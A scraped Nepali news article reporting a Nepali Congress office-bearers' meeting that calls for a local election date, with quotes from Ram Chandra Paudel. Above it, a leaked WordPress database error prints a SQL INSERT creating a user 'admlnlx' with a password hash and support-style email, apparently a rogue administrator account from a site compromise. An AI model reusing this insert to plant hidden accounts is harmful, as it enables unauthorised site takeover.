WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bkm6q2jqYOBMD.RUKzL5KB3TGnHK.E0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:11:49', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ११-
नेपाली कांग्रेसका पदाधिकारीकहरुको बैठकले स्थानीय चुनावको मिति घोषणा गर्न माग गर्दै चुनाव केन्द्रित हुने निर्णय गरेको छ।आज बिहान संसदीय दलको कार्यालयमा सम्पन्न बैठकले स्थानीय चुनावको मिति घोषणा गर्न निर्वाचन आयोगलाई पूर्णता दिनुपर्ने, अवरुद्ध संसद खुलाउन पहल गर्ने तथा संविधान संशोधन प्रक्रियालाई पनि सँगसँगै अगाडि बढाउने वातावरण तयार पार्ने निर्णय गरेको हो।
संविधान संशोधनको प्रक्रिया अगाडि बढाउँदै अब देशलाई चुनावका लागि तयार पार्नुपर्छ,वरिष्ठ नेता रामचन्द्र पौडेलले भने, ुस्थानीय निकायको चुनाव हुनुपर्छ। त्यसका लागि जुन सजिलो हुन्छ पहिले त्यही गर्नुपर्छ।
अहिले अन्तरिम व्यवस्था नै सहज भएकाले स्थानीय निकायको चुनावलाई पहिले सकाउनुपर्ने पौडेलले बताए। स्थानीय तह पुनर्संरचना आयोगले दिएको रिपोर्ट अनुसारको तह प्रस्तावितलाई स्थापित गराउन थुप्रो समय लाग्छ। धेरै काम गर्न बाँकी छ त्यसैले अन्तरिम व्यवस्थापन नै अहिलेका लागि आवश्यक छ, उनले भने।
बजेटको सदुरपयोग गर्न र गाउँगाउँको विकास स्थानीय चुनाव अहिलेका लागि आवश्यक भएको बैठकपछि उनले बताए। हिजैदेखि कांग्रेस पदाधिकारीहरुको बैठकले पार्टी र सरकारलाई चुनाव केन्द्रित गराउनुपर्ने विषयमा छलफल थालेको थियो।